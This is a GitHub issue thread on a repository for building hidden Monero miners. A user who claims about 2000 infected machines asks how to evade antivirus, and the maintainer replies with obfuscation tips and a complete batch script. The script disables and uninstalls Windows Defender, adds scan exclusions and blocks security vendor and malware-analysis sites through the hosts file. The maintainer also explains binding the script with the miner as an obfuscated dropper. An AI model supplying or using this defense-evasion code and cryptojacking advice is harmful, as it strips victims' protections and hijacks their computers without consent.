search

UnamSanctam / SilentXMRMiner

A Silent (Hidden) Monero (XMR) Miner Builder
MIT License
570 stars 163 forks source link

Minimum payout #230

Closed WexisQ closed 3 years ago

WexisQ commented 3 years ago

sorry for my ban english. in the nanopool Minimum payout is 1 XMR, 1 xmr so big limit. I have around 2000 mines but still I make very hard money. How do I get the minimum payment limit to 0.1 xmr.

WexisQ commented 3 years ago

Capture stil detect

UnamSanctam commented 3 years ago

Yeah usually you have to test different obfuscator settings until it becomes undetected. Sometimes rebuilding the miner works as well since it will encrypt everything differently every time.

WexisQ commented 3 years ago

can you show me the settings what i do i don't work

UnamSanctam commented 3 years ago

It's always different since the obfuscations and final results are random and it also depends on if the antivirus has gotten some sort of update then different settings will give different results.

WexisQ commented 3 years ago

Capture I've tried all kinds of things, it just never happens, always perceives

UnamSanctam commented 3 years ago

Some options will increase some detections and some will decrease some. In the worst case it can be easier to find another obfuscator since so many use it and thus it increases the detections.

WexisQ commented 3 years ago

please help me on the internet crypter i can't find It doesn't happen in any way, it's always detected

UnamSanctam commented 3 years ago

Are the detections different every time?

WexisQ commented 3 years ago

Capture Capt2ure I made such a setting that it is not caught by antiviruses but it does not work when I run the virus

UnamSanctam commented 3 years ago

Yeah the "Compress & Encrypt resources" might do that. If you press the cogwheel next to the option there might be som setting that won't break it.

WexisQ commented 3 years ago

I tried all the options. What should I do? I tried crypters on the internet, but it doesn't work. Do you want to tell your own way

UnamSanctam commented 3 years ago

The way I did it was to create a .bat file that "kills" Windows Defender and bind that with the miner with a file binder and when that .bat file ran before the miner it would allow the miner to be used freely since the antivirus was "dead" when the miner ran.

Here is the .bat code I wrote:

powershell -Command Add-MpPreference -ExclusionPath '%cd%'
powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%'
powershell -Command Add-MpPreference -ExclusionPath '%AppData%'
powershell -Command Add-MpPreference -ExclusionPath '%Temp%'
powershell -Command Set-MpPreference -DisableArchiveScanning $true
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
powershell -Command Set-MpPreference -DisableScriptScanning $true
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
powershell -Command Set-MpPreference -DisableIOAVProtection $true
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
powershell -Command Set-MpPreference -MAPSReporting Disabled
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
powershell New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
sc config WinDefend start=disabled
sc stop WinDefend
powershell -Command Stop-Service WinDefend 
powershell -Command Set-Service WinDefend -StartupType Disabled
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
echo 127.0.0.1       www.malwarebytes.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       malwarebytes.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       avast.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.avast.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.mcafee.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       mcafee.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.kaspersky.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       kaspersky.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.norton.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       norton.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       microsoft.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.microsoft.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       any.run >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.any.run >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       virustotal.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.virustotal.com >> "%SystemRoot%\System32\drivers\etc\hosts"
WexisQ commented 3 years ago

thanks what exactly do i need to do this ?

WexisQ commented 3 years ago

please let help to encrypt

UnamSanctam commented 3 years ago

Well, to use the .bat file you would just have to create it and bind it first before the other file though making the window invisible might be a bit harder.

WexisQ commented 3 years ago

This is what I don't understand. ok i bind with the .bat file but already when the virus is downloaded from the internet the defender deletes it automatically

UnamSanctam commented 3 years ago

If it's bound with a file binder then the miner will be encrypted inside the program so the antivirus wouldn't be able to read it and thus can't detect it. You will probably have to obfuscate the bound file though since that might have some detections since it's a dropper.